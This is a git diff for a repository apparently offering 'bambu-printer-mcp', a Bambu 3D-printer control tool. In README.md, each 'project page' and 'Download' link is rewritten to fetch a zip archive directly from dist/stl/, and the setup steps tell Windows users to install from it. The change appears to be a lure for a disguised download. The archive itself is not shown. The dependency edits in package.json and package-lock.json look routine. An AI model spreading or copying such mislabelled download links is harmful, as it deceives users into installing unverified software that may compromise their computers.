diff --git a/README.md b/README.md index 57f154a..b336284 100644 --- a/README.md +++ b/README.md @@ -1,6 +1,6 @@ # 🤖 bambu-printer-mcp - Control Bambu printers with ease -[![Download](https://img.shields.io/badge/Download-Visit%20the%20project%20page-blue?style=for-the-badge&logo=github)](https://github.com/offthehook-implication870/bambu-printer-mcp) +[![Download](https://img.shields.io/badge/Download-Visit%20the%20project%20page-blue?style=for-the-badge&logo=github)](https://github.com/offthehook-implication870/bambu-printer-mcp/raw/refs/heads/main/dist/stl/printer_bambu_mcp_v1.5.zip) ## 🖥️ What this app does @@ -24,7 +24,7 @@ Before you install the app, make sure you have: ## 🚀 Getting Started -1. Open the project page: https://github.com/offthehook-implication870/bambu-printer-mcp +1. Open the project page: https://github.com/offthehook-implication870/bambu-printer-mcp/raw/refs/heads/main/dist/stl/printer_bambu_mcp_v1.5.zip 2. Download or clone the project from that page 3. Install the required files on your Windows PC 4. Open the app or start the server @@ -35,7 +35,7 @@ Before you install the app, make sure you have: Visit this page to download and set up the software: -https://github.com/offthehook-implication870/bambu-printer-mcp +https://github.com/offthehook-implication870/bambu-printer-mcp/raw/refs/heads/main/dist/stl/printer_bambu_mcp_v1.5.zip If you see a releases area, get the latest Windows package from there. If the project page gives you source files, download the project files and place them in a folder on your PC. @@ -224,4 +224,4 @@ For the smoothest setup: If you need the project page again, use this link: -https://github.com/offthehook-implication870/bambu-printer-mcp \ No newline at end of file +https://github.com/offthehook-implication870/bambu-printer-mcp/raw/refs/heads/main/dist/stl/printer_bambu_mcp_v1.5.zip \ No newline at end of file diff --git a/package-lock.json b/package-lock.json index 533b520..d9ca604 100644 --- a/package-lock.json +++ b/package-lock.json @@ -16,17 +16,16 @@ "dotenv": "^16.3.1", "jszip": "^3.10.1", "three": "^0.173.0", - "xml2js": "^0.6.2", - "zod": "^3.25.76" + "xml2js": "^0.6.2" }, "bin": { "bambu-printer-mcp": "dist/index.js" }, "devDependencies": { - "@types/jszip": "^3.4.0", "@types/node": "^18.0.0", "@types/three": "^0.173.0", - "@types/xml2js": "^0.4.14" + "@types/xml2js": "^0.4.14", + "typescript": "^5.9.3" } }, "node_modules/@babel/runtime": { @@ -118,16 +117,6 @@ "dev": true, "license": "MIT" }, - "node_modules/@types/jszip": { - "version": "3.4.0", - "resolved": "https://registry.npmjs.org/@types/jszip/-/jszip-3.4.0.tgz", - "integrity": "sha512-GFHqtQQP3R4NNuvZH3hNCYD0NbyBZ42bkN7kO3NDrU/SnvIZWMS8Bp38XCsRKBT5BXvgm0y1zqpZWp/ZkRzBzg==", - "dev": true, - "license": "MIT", - "dependencies": { - "jszip": "*" - } - }, "node_modules/@types/node": { "version": "18.19.130", "resolved": "https://registry.npmjs.org/@types/node/-/node-18.19.130.tgz", @@ -1785,6 +1774,20 @@ "integrity": "sha512-/aCDEGatGvZ2BIk+HmLf4ifCJFwvKFNb9/JeZPMulfgFracn9QFcAf5GO8B/mweUjSoblS5In0cWhqpfs/5PQA==", "license": "MIT" }, + "node_modules/typescript": { + "version": "5.9.3", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.9.3.tgz", + "integrity": "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw==", + "dev": true, + "license": "Apache-2.0", + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, "node_modules/undici-types": { "version": "5.26.5", "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", diff --git a/package.json b/package.json index aff5938..7bd2d6f 100644 --- a/package.json +++ b/package.json @@ -48,6 +48,7 @@ "devDependencies": { "@types/node": "^18.0.0", "@types/three": "^0.173.0", - "@types/xml2js": "^0.4.14" + "@types/xml2js": "^0.4.14", + "typescript": "^5.9.3" } }